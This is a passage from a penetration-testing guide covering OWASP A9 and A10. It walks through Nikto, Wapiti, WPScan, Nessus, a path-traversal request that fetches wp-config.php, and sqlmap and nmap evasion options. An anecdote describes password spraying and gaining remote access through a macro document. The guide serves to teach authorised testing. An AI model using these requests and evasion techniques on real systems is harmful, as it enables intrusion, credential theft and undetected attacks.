ture enough to provide me with a snapshop of all system vulnerabilities and
Rapid7/Nexpose had released a check for Heartbleed in addition to the pub-
OWASP A9:2017 Using Components with Known Vulnerabilities 153

licly available Perl script everyone at the time was using to check for the
vulnerability. The overwhelming majority of our servers were running Win-
dows with Microsoft's TLS implementation, which was not vulnerable, but
we had a large footprint. We owned/leased a slash 20 (4,096 external IP ad-
dresses) that did not even include our remotely hosted systems. With over 100
domains, several signicant business units and thousands of servers, work-
stations, network devices, appliances, printers and more, the challenge was
ensuring we were scanning everything we owned or were otherwise respon-
sible for. At one point during my quest to make sure all of our assets were
scanned, I even made the overzealous mistake of actively exploiting Heart-
bleed, dumping RAM, obtaining credentials, logging in with those credentials
on a domain which was very similar to one we owned but alas was not ours
(oops).
By the time three days had elapsed since the original public release of the
vulnerability, my team and I felt condent the enterprise was not at risk since
all known Heartbleed vulnerabilities (however limited) on internal systems
had been patched, and externally available systems were scanned and found
to not be vulnerable...or so we thought. The next day we learned of our
oversight. Working on the enterprise security team, my colleagues and I were
responsible for making sure all business units under the corporate umbrella
were included in regular scanning. One business unit, however, was not being
completely scanned, at least not by my team. A client/user of this business
unit's services (just a regular person on the internet) made the discovery
by using the same Perl script to exploit the OpenSSL implementation on
a WAF. He took a screenshot, sent in an email to the business's general
contact mailbox, and that message quickly made its way through the process
of escalations until reaching the president of the company, as well as all C-
level executives and subsequently my team's email distribution list. It was
an epic fail on the part of enterprise security. How could we scan everything
for multiple days and miss this? The impact to the business was nonexistent
as there was no evidence of abuse, but the impact to my team's reputation
was real.
At the same time, my previous employer was mostly a Linux shop and
fared MUCH worse as they had just over 500 publicly exposed servers run-
ning the vulnerable OpenSSL version. In the days and weeks that followed
the public release of Heartbleed one could always tell who was impacted by
looking at the SSL certicate's date of issue; if it was issued within the last
week that was a pretty clear indicator that the system was vulnerable and
the proper remediations took place to remedy the situation.
154 The Penetration Tester's Guide to Web Applications

Heartbleed was a signicant vulnerability, the likes of which I don't think


have been surpassed yet. There have been several close rivals, but the ability
to remotely attack systems, potentially gain access to critical information, not
trigger any alarms or risk crashing the service, and do so consistently and
with ease makes Heartbleed probably the most critical vulnerability I have
had to protect against in my career. These elements also make Heartbleed
one of the most fun to exploit. OpenSSL is but one of dozens of components
we may use for our web application. Taking the time to fully understand what
comprises an application, what makes it work/what technologies it relies on,
will go a long way in our eorts to secure the application; the same can be
said for attacking it.

How to Exploit: Attackers have a luxury enterprise defenders do not have:


Time! As an attacker we need to nd one critical shortcoming and exploit it
to gain access and wreak havoc (or more accurately, exploit it in a controlled
and professional manner to accurately convey the risk of the exposure). De-
fenders have the challenge of trying to secure everything and thus, their
time and resources are typically stretched thin between the various tasks and
projects for which they are responsible. Because of this, a security operations
center (SOC) has to rely on the development team (and other teams) to
be responsible for taking part in security. A SOC, DevSecOps, penetration
testers, security champions, and other names for people or teams directly
responsible for application security are myriad, but all too often there is a
disconnect between the people writing the code and those responsible for pro-
viding the infrastructure, scanning the code, provisioning systems, reporting
vulnerabilities, and speaking to the board of directors. This is reality and it is
typically more pronounced the larger an organization gets. As this disconnect
grows, so does the potential for overlooking seemingly benign elements of the
security program. This is where we need to focus our eorts as penetration
testers in order to identify when a web application is using components which
are known to be vulnerable.
For in-house penetration testers we need to bridge the gap between secu-
rity and development. We have to insert ourselves into the process in order
to understand the platform and where/when risks are introduced as well as
forecast what will eventually become an issue if no action is taken to prevent
it; for instance, if an open-source library the application relies upon ceases
to be maintained.
As the title of this chapter indicates, for OWASP number nine we are
trying to identify components with known vulnerabilities. We as an informa-
OWASP A9:2017 Using Components with Known Vulnerabilities 155

tion security community, and more broadly as a society, don't have a history
of blaming the victim when a 0day is used, and of course the very nature
of a 0day means there is no signature for it. Hence known vulnerabilities
are what we need to focus our attention on as we can usually easily iden-
tify them. In most cases we do this by using a vulnerability scanning tool
and other automated scanning solutions. Before we discuss tool usage, let's
revisit our luxury of time as it relates to 0day vulnerabilities. There will be
times when we are suciently motivated (halfway through an engagement
with no access to any systems) to focus attention on discovering a new vul-
nerability. The 0day terminology is more reserved for previously undisclosed
vulnerabilities with the potential for great impact (not necessarily reected
XSS on a homegrown app with a minimal user base), but any new vulnera-
bility we discover can still be used as part of our engagement and responsibly
disclosed to the vendor. Finding vulnerabilities in software components is
usually accomplished by reviewing the source code (in open-source projects
for example), identifying criteria that causes the software to malfunction,
or by other fuzzing techniques. While time-intensive (between identifying an
error condition and crafting a suitable and reliable attack), exploring new
vulnerabilities can be fruitful and is certainly a skill set to sharpen.
Oftentimes discovering new vulnerabilities is not necessary, however, as
there are enough application layer vulnerabilities to take advantage of. Using
a vulnerability scanning tool is a great way to nd these; enter Nikto. Nikto
is a free tool written in Perl that we can use to scan web applications for
thousands of potential issues. Nikto is not a full-featured web application
vulnerability scanning solution but it is free, it does work well, it is updated
regularly, and it is mature software (reliable). For these reasons it is a go-to
tool to gain an initial idea of the attack surface of an application. As a CLI
tool we invoke it by specifying nikto.pl -host https://evilsite.info, but not
before changing the default user agent.
Nikto is not designed to be stealthy; in fact, by default it will send a user
agent string clearly identifying itself to the target system, and because of
this, it will be blocked by any properly tuned IPS/WAF. It's not uncommon
for someone new to the tool to run it, get no results, and be oblivious to
the fact that the scans were all being blocked by an intermediary device. If
Nikto is installed as part of our OS then /etc/nikto.conf is the location of
the conguration le we need to edit. Likewise, if we download the tool then
the nikto.conf le located in the downloaded archive will be the le we need
to modify to alter the user agent string. We can see this in Figure 10.1.
156 The Penetration Tester's Guide to Web Applications

Figure 10.1 Nikto directory structure.

A quick way to obtain a common user agent string is by using our browser
to conduct a web search for "what is my user agent", copying the resulting
string and pasting it into the appropriate section in Nikto's conguration
le. We can just as easily tell Nikto which agent to use during runtime via
the -useragent switch; the takeaway is to never use the default agent. This
process is depicted in Figures 10.2 and 10.3.

Figure 10.2 Identifying our user agent quickly.

Figure 10.3 Modifying Nikto's conguration le to change the user agent.
OWASP A9:2017 Using Components with Known Vulnerabilities 157

Running the tool produces output on the command line conveying identi-
ed issues. The tool will always mention missing security headers that are
useful for client-side attacks. In addition, Nikto will communicate the path
on the server where the issue was discovered, which makes reproducing the
nding easier. We denitely need to manually verify the results as Nikto,
like other tools, will produce false positives such as incorrectly identifying
vulnerabilities or incorrectly keying o of HTTP 200 response codes. There
are a multitude of conguration options we can modify to get more targeted
results, running nikto.pl -H will output an extended help menu showing the
various options available. Outputting scan results to a le with the -o option
is useful as is running the tool through a proxy to help see what trac it
is submitting as well as enabling evasion, tweaking the max timeout, and
specifying a hard stop time for the scan. Figure 10.4 shows the results of a
Nikto scan.

Figure 10.4 View Nikto's results on the command line.

While we are looking at the missing security headers, the securityheaders.io


website is a great resource for externally checking for the existence and proper
implementation of all security related headers. The tool (see Figure 10.5)
shows a similar output to the Qualys SSL check; a bright red "F" or shiny
green "A+" for web applications failing to implement security headers and
those that do so very well, respectively.

Figure 10.5 Results of securityheaders.io HTTP response header checking.


158 The Penetration Tester's Guide to Web Applications

The initial Nikto scan didn't nd much but it also didn't spider the site, an
important piece of information we should be aware of. In fact, in looking at
our interception proxy (if congured to do so) or HTTP access logs, we can
see Nikto spends lots of time/makes lots of requests for default le names (we
can see this in Figure 10.6) and does not provide robust coverage for testing
the OWASP top ten for example.

Figure 10.6 Nikto scanning requests as seen from Apache's access_log.

Nikto is quite useful for nding les indicative of compromise or poorly con-
gured application components, but it is limited in what is searches for;
another tool to explore is wapiti. Wapiti is another free tool, this time writ-
ten for Python3, which has support to identify File Inclusion vulnerabilities,
Command Execution, Injection vulnerabilities, as well as more typical issues
like XSS and certain miscongurations. We can run Wapiti just as easily as
Nikto with simple command execution from our terminal. An example of
doing so is shown in Figure 10.7.

Figure 10.7 Wapiti's initial scan.


OWASP A9:2017 Using Components with Known Vulnerabilities 159

This time when we examine the HTTP access logs to see what requests Wapiti
made, we note there are only four. Not particularly indicative of a thorough
test. We can see this in Figure 10.8.

Figure 10.8 Wapiti scanning requests.

The reason for this is that there are no parameters included with the request,
and the home page for evilsite.info was essentially a blank page. The reason
it is important to see a lack of useful ndings is to make it clear that tools
are often very close to useless if we don't congure them correctly and know
how they work.
Focusing on evilsite.info, performing some initial recon to help guide our
tools like Wapiti during their scanning process can be accomplished with
archive.org, web searches, and forced browsing. We are looking for the ex-
istence of other folders and pages on the website. Archive.org made several
archives of the website throughout the years, and it looks like evilsite.info was
used for various phishing campaigns. Search engine queries don't return any
useful results, but guessing directories with a forced browse attack does re-
veal several potentially useful directories. By manually browsing to /xss.php
we can see what looks to be a training environment with a vulnerable form.
Pointing Wapiti to this form and providing a base GET request (submitting
the form presented on the page) results in the tool nding one XSS aw
which we can see in Figure 10.9.

Figure 10.9 Wapiti nding one XSS aw.

While useful/interesting, this XSS aw is due to a programming error, not


necessarily the author of the application using components with known aws.
To hone in on this specic class of issues (typically version-based) requires
a more methodical approach: Performing recon and mapping will help to
identify attack surface, and building o of that with scanning will be the
160 The Penetration Tester's Guide to Web Applications

most direct way to nd vulnerabilities. Additionally, we will make heavy use
of public resources to glean more details about a given aw as it pertains to
example attacks, exploit code, and our research eorts. With this knowledge
and exposure to a couple of potentially useful tools, let's cover some examples
of how to exploit applications using components with known vulnerabilities.

Examples: WordPress is a popular CMS for which many people have written
plugins, of which many are known to be vulnerable. When testing a Word-
Press application and discovering a known vulnerable component, one of our
rst instincts may be to search metasploit for a matching exploit. Doing so
usually leads to disappointment: A search for WordPress exploits yields less
than seven for all of 2018. A more appropriate tool to identify and subse-
quently exploit WordPress vulnerabilities would be a combination of WPScan
(a tool designed specically to nd WordPress vulnerabilities) and the ex-
ploit database. We can invoke WPScan (WordPress scan) from within Kali
with a succinct command of wpscan url http://evilsite.info/blog. The results
of this scan will usually reveal outdated plugins and specic vulnerabilities
based on the identied version number of the install (see Figure 10.10).

Figure 10.10 Example of WPScan results.

With this information we can scour exploit-db.com looking for exploit code.
In doing so, based on the version, 1.0.11, of the Ad Manager Wd plugin we
can see that with a simple GET request we can execute an arbitrary le
download. With this information, access to the wp-cong.php le is granted
via the HTTP GET request referenced below and depicted in Figure 10.11.
http://evilsite.info/blog/wp-admin/edit.php?post_type=wd_ads_ads
&export=export_csv&path=../wp-cong.php
OWASP A9:2017 Using Components with Known Vulnerabilities 161

Figure 10.11 Arbitrary le download.


Armed with the name of the database, the username, password, and hashed
values of user authentication information we can proceed to try and crack our
way into a valid session. In addition, we can use this vulnerability to down-
load other les from the hosting webserver in an eort to obtain additional
information about the target and other avenues of attack.
This same general process works for other software as well, the caveat be-
ing less popular software doesn't have dedicated tools to help identify version-
based vulnerabilities. Less popular software also doesn't have as large a user
base, which can result in less people being interested in nding and pub-
lishing aws for these applications. On the opposite side of the spectrum is
JavaScript, specically libraries from Angular to Zombie and retire.js, which
tracks and noties us when it detects outdated software. We can use retire.js
as a browser plugin (as well as Burp Pro extension) and simply browse to a
page where it will detect which libraries are in use and visually notify us of
detected versions and known vulnerabilities. We can see this in Figure 10.12.

Figure 10.12 Retire.js's browser plugin identifying a vulnerable library.


As with other scanning tools, we still need to use this information to aid in
searching for exploit code. However, other tools exist which have a broader
database of known vulnerabilities and accompanying checks to validate the
nding when its discovered or even exploit it. One such tool is Nessus, specif-
162 The Penetration Tester's Guide to Web Applications

ically, as it pertains to web applications, its web application vulnerability


scanner (not to be confused with the multitude of other products Tenable
has for vulnerability identication and management). With over 500 (see
Figure 10.13) vulnerable component checks, Nessus's web application scan-
ner can prove to be useful but we should not expect it to be able to nd
every aw.

Figure 10.13 Snippet of Nessus Plugins.


Using Nessus to scan evilsite.info results in a total of 26 vulnerabilities rang-
ing from missing headers to blind SQL injection. One specic component
vulnerability was identied as well, "Apache Tomcat 7.0.x < 7.0.82 Remote
Code Execution via JSP Upload". This aw was identied based on the
version number reported by evilsite.info's webserver, however, it was not ex-
ploited and not conrmed as is typical for basic vulnerability checks based
on version number. Nevertheless, this is an interesting potential aw which
we will delve into. We can see more information about this aw in Figure
10.14.

Figure 10.14 Nessus Tomcat vulnerability.


We can glean some information about the aw from within Nessus, but doing
so is merely the starting point in our research. For instance, included with the
vulnerability details within the Nessus report is a link to tomcat.apache.org
OWASP A9:2017 Using Components with Known Vulnerabilities 163

(Figure 10.15) which, when we follow it, leads to a list of Tomcat vulnerabil-
ities based on the dierent versions.

Figure 10.15 Tomcat additional information.

From this list we are shown a link to the CVE which in turn shows us the link
to the exploit database where the exploit code resides. Not to be overlooked
are the various mailing lists and links to other relevant discussions and back-
ground information on the CVE. We want to have a thorough understanding
of what the aw is, how it can be exploited, and what prerequisites are re-
quired. This is crucial information because we want to have more than cursory
information about the vulnerability prior to vetting the exploit code, which
is shown in Figure 10.16.

Figure 10.16 Snippet of Python code used in the exploit.

What should be clear from this dialog is that we don't run a scan, nd a
CVE, search for random exploit code, and execute it against our client's
environment. Instead we vet the code from a trusted source, executing it in
a test environment after adequate research. Short of doing so we may end
up creating a DOS condition, exposing sensitive information to an attacker
or worse. Professionalism matters. Proceeding with our research into this
CVE and exploit code we want to conrm the version of the vulnerable
software component, and that which the exploit says it targets. From there we
164 The Penetration Tester's Guide to Web Applications

manually review the exploit code and ideally setup a target/test environment
with the vulnerable version of software. Even if we don't have the matching
vulnerable software available in a test capacity, we can still test the exploit
code against a suitable target to help ensure it does what we think it will do.
We can see the Apache logs showing the results of executing the exploit in
Figure 10.17.

Figure 10.17 PUT request submitting payload.

Once vetted, we can launch the exploit against our target environment and
be greeted with a means to execute commands on the remote system via a
web shell. In some cases, we will need to modify the exploit code to suit our
needs or otherwise get the code to work in our specic situation.
Looking back at the initial Nessus scan results reveals that the scanner
may have missed several vulnerabilities. This is not uncommon but it can take
eort to try and determine which aws exist but are not reported. Looking
at HTTP response headers shows that one of the applications running on
evilsite.info appears to be Tomcat, as previously identied, but a closer in-
spection of default conguration les identied with Nikto shows that one
of the underlying applications may be running Apache Struts as shown in
Figure 10.18.

Figure 10.18 HTML code showing version.

Depending on the exact version, the implementation may be vulnerable to a


multitude of remote code execution (RCE) vulnerabilities among other aws.
Turning our attention to metasploit (Figure 10.19) reveals several potential
candidates, and exploring each of them reveals very specic criteria which
must be met in order for the exploit code to work.
OWASP A9:2017 Using Components with Known Vulnerabilities 165

Figure 10.19 Metasploit struts2_namespace_ognl.


We want to continue mapping the application, with our browser and proxy,
to try and identify the existence of the required criteria. In some situations
we can nd information about the target environment, and this will lead to
an applicable exploit as we saw earlier. In other cases we can work backward
from the exploit to nd the injection/attack point where it is most likely
to succeed. As we continue to map the application, we want to look for a
valid endpoint which is congured as a redirect action. Once identied we
can leverage metasploit to launch the attack and gain shell access.

Link to hands-on portion: https://tptgtwa.com/owasp9


Root Cause and Conclusion: The desire to rapidly deploy applications
along with the ease of implementing technology lowers the bar for application
development. With this comes a signicant amount of overhead as various
related technologies depend on one another. These complexities can result in
the challenging task of maintaining software components, constantly updat-
ing code, and deploying software in a stable and secure manner.
Just as there are tools to help ease the burden of package updates and
deployments, there are tools which allow for easy identication of vulnerable
components. Vulnerabilities occur at all layers of the stack and oftentimes it
takes multiple tools to identify all of the aws present in an application. Some
vulnerability scanning tools will miss entire classes of vulnerabilities while
other ndings will be missing a matching exploit. Because of this we need to
ensure we are conducting quality recon, thoroughly mapping the application,
and leveraging multiple tools to help get a complete picture of the attack
surface of an application. In addition, we want to make sure we properly
research a vulnerability to understand how it impacts the application, how
we can exploit it, and what to look for to conrm the vulnerability is present.
166 The Penetration Tester's Guide to Web Applications

Ensuring we have a test environment is benecial as often there is a need to


vet an exploit prior to using it in a production environment.
There are no shortage of components used in modern web applications;
the more popular of which are eventually found to host vulnerabilities. As
an attacker however, conrming the aw and exploiting it can be dicult,
which is why for the best outcomes we want to adhere to our methodology
and focus on vulnerability research as a matter of course.
Chapter 11

OWASP A10:2017
Insucient Logging and
Monitoring
Denition: Insucient logging and monitoring, coupled with missing or in-
eective integration with incident response, allows attackers to further attack
systems, maintain persistence, pivot to more systems, and tamper, extract,
or destroy data. Most breach studies show time to detect a breach is over 200
days, typically detected by external parties rather than internal processes or
monitoring.

Details: Writing software takes time, eort, and patience, especially when
debugging. The best information at every developer's disposal to help with
this process is logs. Logs are so important to the software development process
that there are typically levels of verbosity we can congure to display more
information in log output when needed. We see this in the tools we use as
penetration testers. If we try to download something with WGET and receive
an error we can invoke the -d ag to enable debugging. In sqlmap, tcpdump,
and nmap we can invoke -v(v)(v) to get a clearer picture of what the tool
is doing, what it is seeing, and what is causing an error, respectively. With
Apache, IIS, Nginx, and every programming language we have discussed (and
the ones not mentioned) as well as every software component, we have the
ability to log information.

167
168 The Penetration Tester's Guide to Web Applications

Some of the logging is performed as a matter of course, such as HTTP


request and error logging. Other logging is specic to the application, such
as failed login attempts, exceptions, try statements, logic conditions, and
anything else the developer chooses to log. In a mature environment these
logs are collected in short order, sent to a point of collection, forwarded to
a centralized and redundant logging server, and made available via layers of
abstraction for querying, correlating, and alerting. In the majority of envi-
ronments logs are stored locally, and no one looks at them unless there is an
issue. This is a boon for us as our attacks have a high probability of going
undetected.
As part of a quality penetration test, we want to make sure we test for
this vulnerability, but we can't usually do it alone. Identifying this aw typ-
ically takes a coordinated eort between the penetration tester(s) and the
target organization. Purple teaming exercises are worth looking into at this
juncture; however, know there is a need to coordinate our attacks with the
client/business. In addition, keeping accurate notes of when each phase of
our Red Team methodology is executed will aid the Blue Team in correlating
logs, and ensuring visibility across the enterprise. Recall that our goal is to
qualify and quantify the risk to the organization the best we can; in addition
to exploiting vulnerabilities we need to track our activities and provide this
information to our counterparts. It is in this fashion that the organization
can learn and grow. Tuning detection tools, identifying gaps in visibility and
tool-sets, training new team members... these are things we can help our
client/business do when focusing on OWASP #10.
We do this by coordinating and communication: When are we launching
a scan, when are we launching sqlmap, when are we executing a credential
stung attack, what IP addresses are we coming from, which endpoint are
we targeting, which system have we compromised. All of these topics should
be discussed and outlined in the rules of engagement prior to beginning the
testing. There are, however, times and organizations which don't have a de-
sire or the infrastructure/capabilities to engage in a coordinated eort. In
these cases the communication component is removed, but our note-taking
and record-keeping remain consistent. There will be times when our activ-
ity renders a service unresponsive and having a solid log of what we did to
cause the issue is important. Likewise, there will be times when we success-
fully elevate privilege/gain remote access, and the business needs to know
the specics of our actions to try and research which systems were impacted.
The logs should have noted the events and be able to be used to ascertain
why no one was alerted.
OWASP A10:2017 Insucient Logging and Monitoring 169

As we proceed to exploit the rst nine most critical web application vul-
nerabilities, it will behoove us to take meticulous notes because a typical SQL
injection attack may result in multiple ndings if it is discovered that there
were no logs associated with our attacks.

Real-World Dialog: I remember the rst time I included "Inadequate Log-


ging and Alerting" as a nding on a penetration testing report. I ranked the
risk as high in conjunction with several other identied vulnerabilities. I was
working for a large organization conducting a web application penetration
test against their agship application; it had hundreds of thousands of users.
I was not given a test account, which was rare, and I was concerned about
being able to test authenticated pages and do a thorough job overall. Without
credentials I was relegated to a login page, a password reset page, and a basic
help page. Soon enough I found a viable username harvesting vulnerability
and noted the login page had some JavaScript indicating when the password
length met the minimum requirement (which was eight characters in length).
In addition, the authentication process would communicate, upon each failed
login attempt, the remaining number of failed logins it would accept before
locking out the account, which started at nine. Usernames were not based
on email addresses and consisted of choices like "jsmith" and "kjohnson".
I used U.S. census data to obtain records of people's last names, which I
prepended with each letter in the alphabet using a bash script. I trimmed
my resulting list to 1,000,000 potential usernames and proceeded to choose
three passwords. Failing to login three times would not lockout accounts (un-
less there were already six failed logins for that account) so it seemed like a
reasonable number since I was not trying to do harm. I chose what I thought
would be good options for passwords based on the length requirement and
the theme/purpose of the website. I could have used Burp to send three mil-
lion requests (the million usernames multiplied by the three passwords) but
I wanted to rst conrm which of the usernames were valid in case I needed
to launch more targeted attacks. Starting at 11PM I used Burp to load my
username list, congured the grep extract option to trigger on the indicator
of a valid username, and kicked o the Intruder attack. I then worked on
other tasks.
When I returned my focus, I had a list of over 10,000 valid usernames
which I promptly congured Burp to attack with my predened passwords.
Less than ve of the 10,000 accounts had one of the three passwords set but
that was enough to compromise several user accounts. Once logged into the
application with a compromised user account I had visibility into previously
170 The Penetration Tester's Guide to Web Applications

submitted documentation (PII including name, email, DoB, physical address,


phone number, SSN, and more) and the ability to upload more. With this
access I tried to upload a shell which failed but a malicious Word document
succeeded, was accessed, bypassed AV, executed macros, and gave me re-
mote access into the organization. Once full access to the organization was
obtained, a report ensued. Of the higher-risk ndings, one that stood out was
the lack of monitoring and alerting.
I literally submitted over 1,000,000 failed login requests in one day from
the same IP address. How did this not trigger some alarms? I learned that
there was an IPS in place which wasn't congured to decrypt TLS trac;
all of my trac ew under that radar. A TLS inspecting WAF was in place
but there were no rules to detect my legitimate requests; after all I was not
launching injection attacks. The webserver was logging every request, but
these logs were only stored locally, and not checked for suspicious behavior. In
short, there was nothing congured to detect this type of attack and while this
event took place several years ago, to this day I nd the exact same issue on
most every penetration test I perform: Malicious events are either not logged
or they are logged and nothing is tuned to alert on this type of activity. Even
vulnerability scanning, attacking from TOR, causing unhandled exceptions,
and the like are not triggering alerts. Many things are logged, and sometimes
there is even a SIEM in place, but too often the right things are not logged,
tools are not tuned, and security sta are not trained adequately to put the
pieces together and detect many web application attacks (which is good news
for us).

How to Exploit: The impact and even the ability to successfully exploit
every vulnerability we have discussed so far in this book could have been re-
duced/thwarted with proper logging and alerting. With this understanding,
and given the nature of this aw, it may seem counter-intuitive to expend
eort being stealthy with our attacks. The reality is that we don't know what
we don't know, and crafting attacks which do not trigger alerts is something
we typically can't plan for without knowing the details of the target infras-
tructure. The rules of engagement, however, are what we can rely on to help
guide our decision making as we engage the client or business. Communicat-
ing with the business to determine if our attack trac should trigger alerts,
and then conrming what certain attacks actually do, is a valuable conver-
sation to have to help the business tune its security systems. Likewise, if the
concept of specically testing this control is not brought up with the business
then we can proceed to attack as normal. The way we exploit a poor logging
OWASP A10:2017 Insucient Logging and Monitoring 171

and alerting aw is by attempting to evade detection and ensuring our attack
trac doesn't raise alarms, but, of course it is more complicated than that.
Primarily it is more complicated because of our lack of knowledge about the
infrastructure, and also because the business can fail this check even if the
right things are being logged and alerted on (if people are not reviewing and
responding to the alerts). For these reasons, the way we exploit this aw can
morph into a series of specic attack scenarios where we coordinate with the
business on what/when we are testing, and they provide evidence of logs and
alerts correlating to our attacks. This means that part of our nal report will
include screenshots provided by the client showing/proving they were aware
of the attack, able to respond to it, and take appropriate action, in the event
the client can provide this.
As we conduct our penetration testing following our normal methodology
our actions will be blocked, logged, or successfully penetrate the applica-
tion/organization and not trigger any alerts. Unless specically guided to
do so based on what was previously discussed, there is no need to alter our
process or do anything special to test for insucient logging & monitoring.
This assumes we are conducting a thorough test, properly noting our attack
timing, and professionally engaging in ethical attacks. With that, let's talk
about what it looks like to exploit this aw, and deepen our understanding
of coordinating with the business to measure a failure versus a success of this
vulnerability and the applicable security control, respectively.

Examples: Splunk, LogRhythm, QRadar, SolarWinds, and several others


dominate the market of SIEM (security Information and Event Management)
products. Depending on the size, maturity, and needs of an organization they
will have one (or more) of these tools at various stages of readiness and
decommission. It's worthy to note decommission as it is widely accepted that
log management and SIEM solutions in general are the most likely tools to
be replaced on an ongoing basis. A SIEM is a collection of tools responsible
for log collection, normalization, and retention, as well as incident detection,
alerting, and event correlation. The suite of tools are only as good as the data
feeding them: garbage in, garbage out. In addition to requiring a holistic set of
logs from all enterprise systems (IDS, IPS, WAF, rewalls, routers, and other
networking devices, applications, servers, and workstations), these tools also
need to be tuned appropriately to the environment and monitored constantly.
Depending on the size of the business, the ongoing process of tuning a SIEM,
ensuring complete coverage of systems, and responding to alerts can easily
account for multiple full-time positions. Purchasing the system, implementing
172 The Penetration Tester's Guide to Web Applications

the system, paying for terabytes of storage and salaried positions to operate
the solution can cost millions of dollars, which does not factor in maintenance
contracts and other team members' time to get the most out of the system.
Because of this it is not uncommon to see SIEM integration fall into one of
three categories: large enterprises fully vested in their SOC's success, large
enterprises with a contractual obligation to have a SIEM in order to check
an audit box, and nally the "other" category, which either has no SIEM
or only has components of a SIEM at various stages of implementation. The
rst category can be exploited due to being too large, too complex, and too
disparate despite their best intentions; things will get missed and not all
applications will be congured to log useful logs that could aid in thwarting
attacks. The second category can be exploited due to a lack of expertise,
oversight, and minimal coverage. The company wants to pay to log what's
contractually obligated, but neglects other systems as it would raise the price,
which results in our attacks of other systems going unnoticed, and subsequent
compromised hosts being used as pivot points to the high-risk targets. We
can successfully exploit the third category due to a lack of complete coverage
or only rudimentary alerting being implemented, resulting in some alerts
being generated but no one being notied. In the event we do need or want
to reduce the noise our attacks create and our likelihood of detection, some
of our tools can provide us with options to be more clandestine just as our
techniques can be altered to evade.
This rst example uses nmap. Other than adjusting timing (such as the
delay between packets), we can alter the source IP/port that packets will
appear to be sent from as well as append custom payloads to packets and
utilize proxy chaining. We can see some of these options in Figure 11.1.

Figure 11.1 Nmap lter evasion.


The goal of these options in nmap is to confuse the target system's defense
mechanisms, specically IDS and upstream network security devices, by at-
tempting to ensure our packet scanning actions don't match a signature, and
OWASP A10:2017 Insucient Logging and Monitoring 173

thus don't trigger an alert. For example, using nmap with -D (Decoy scan)
simply spoofs some of the source IP addresses nmap will send; of course,
responses from the target system to those spoofed addresses will never reach
our interface since this technique merely attempts to bypass scan detection
lters. Nmap does have a more interesting zombie (or Idle) scan which uses
dierent and more complex means to the same end. This is interesting and
useful, but when used to probe internet-facing systems it's not typical for a
SOC to be alerted and respond to every port scan; in the industry this is
what is referred to as rain on the umbrella. On the internal network, post
exploitation, is where such evasion techniques will prove to be invaluable as
an internal sensor detecting a port scan from a non-scan engine likely would
warrant further investigation.
Some of the various features of sqlmap were mentioned in chapter 2,
and we can expand upon that by looking into how to invoke various lter
evasion options when utilizing the tool. As seen in Figure 11.2, the commands
invoked include random-agent, tor, delay 12, hpp, dmbs=mysql and 
tamper=unmagicquotes.py as they pertain to options helpful for making our
attack slightly stealthier.

Figure 11.2 Running sqlmap from the command line.


The random agent option tells sqlmap to use a unique user agent string in-
stead of sending the default or user-specic values. The TOR options requires
TOR to be installed (apt-get install tor from within Kali followed by execut-
ing "tor" on the CLI to enable the service and connect the circuit) and will
be used to route all attack trac through the anonymization network. Spec-
ifying a delay of 12 will make sqlmap wait 12 seconds before sending its next
probe/attack packet. HTTP parameter pollution, invoked with the hpp op-
tion, can help evade WAFs lters tuned for specic applications by placing
the injected values in parameters located outside of their normal positions.
By clearly communicating which type of database sqlmap should attack, the
dbms option drastically reduces the initial trac sent to the target appli-
cation as sqlmap doesn't have to inject attack strings for multiple database
languages. Finally, the tamper switch. Several dozen dierent tamper options
exist, and we can use the list-tampers option to get a description of each.
In this example the unmagicquotes evasion technique was chosen; depending
on the situation and our testing results, we will want to change this option
and try others until we get successful results. Running sqlmap without these
174 The Penetration Tester's Guide to Web Applications

options results in a lot of malicious trac being sent from our machine with
no hope of evading even the most basic detection tools.

Figure 11.3 Running sqlmap without any lter evasion switches.

Conversely in Figure 11.4, we can see the source address of TOR, a believ-
able user-agent, amply spaced requests (in terms of time delay), the HTTP
pollution, and tamper eects all taking place as we specied in the hopes of
going unnoticed.

Figure 11.4 Running sqlmap without any lter evasion switches.

This next example takes another look at Nikto. In addition to changing the
default user agent, we have a couple more options such as modulating cAsE,
URI encoding, and attempting to bypass detection lters by including ran-
dom strings with each request. Another option to aid in our lter evasion
endeavors is to tune the trac Nikto sends to remove the checks we think
will be fruitless, such as checks for elements associated with the target envi-
ronment we know don't exist (like references to /etc/passwd, .ssh*, .htaccess
if the target system is Windows running IIS). In addition, we can tune Nikto
to use only certain plugins, and use the tool more like a traditional scanning
tool but with more specicity. Options for Nikto are shown in Figure 11.5.

Figure 11.5 Optional Nikto evasion options.

In this fashion we reduce the amount of trac we send to the target to


minimize the chances of detection, and at the same time, increase our chances
OWASP A10:2017 Insucient Logging and Monitoring 175

of nding a aw based on previous recon eorts coupled with tuned scanning
requests. For example, by invoking Nikto with the -evasion 6, -Plugins 2,
-Tuning e options, we can selectively choose to utilize "tab" as a space, have
Nikto guess for password le names, and scan for administrative consoles.
Nikto -H will show an extended menu where such options can be selected.
The results of the scan as seen from the webserver logs of the target machine
show a targeted attack which would likely bypass some lters, but is still
noisy and not necessarily doing what we told it to do. There is no evidence of
using tabs and no evident/real password lename guessing or admin console
scanning, as we can see in Figure 11.6.

Figure 11.6 Optional Nikto evasion options.


Use the -useproxy option with a value of http://127.0.0.1:8080 coupled with
Burp or ZAP running to view the requests, and tweak the options as required
to get the desired results. Within Burp and ZAP we can also modify any
trac going through these proxies to mangle requests, add/remove cookies,
and more. While not specically aimed at lter evasion, and ensuring our
requests don't trigger alerts, the built-in capabilities in Burp and ZAP are
powerful. Since we have complete control over what trac leaves the proxy
and how it is formatted, we have granular control over shaping this trac to
suit our needs, as we can see in Figure 11.7.

Figure 11.7 Burp proxy options.


We can further mask our attacks by leveraging multiple IP addresses in con-
junction with TOR, VPN services, and proxies to eectively anonymize the
location/origin of the attacks. This can result in multiple alerts, however,
176 The Penetration Tester's Guide to Web Applications

and raise suspicion if not done in a relaxed manner. Nevertheless, to have


any proxy-aware tool use TOR with the added benet of leveraging Burp as
an intermediary proxy, we can congure Burp to send its outbound trac
to a SOCKS proxy via the "User Options". This will work for our browser
trac and tool trac as long as they are congured to use Burp as a proxy,
which is shown in Figure 11.8.

Figure 11.8 Burp proxy options.


Some of the best recon and research can be accomplished without ever send-
ing a packet to the target destination. By using OSINT techniques, we can
leverage publicly available information (for example cached Google search
content) to gain information about the target platform. Performing oine
analysis of the source code is also a possibility if its open-source. In this
situation it would be benecial to emulate the target application in a test
environment, and craft suitable attacks/exploits in this arena prior to ac-
tively exploiting the target application. Looking at the cached Google search
results (Figure 11.9) of the target application could show the CMS version
in use.

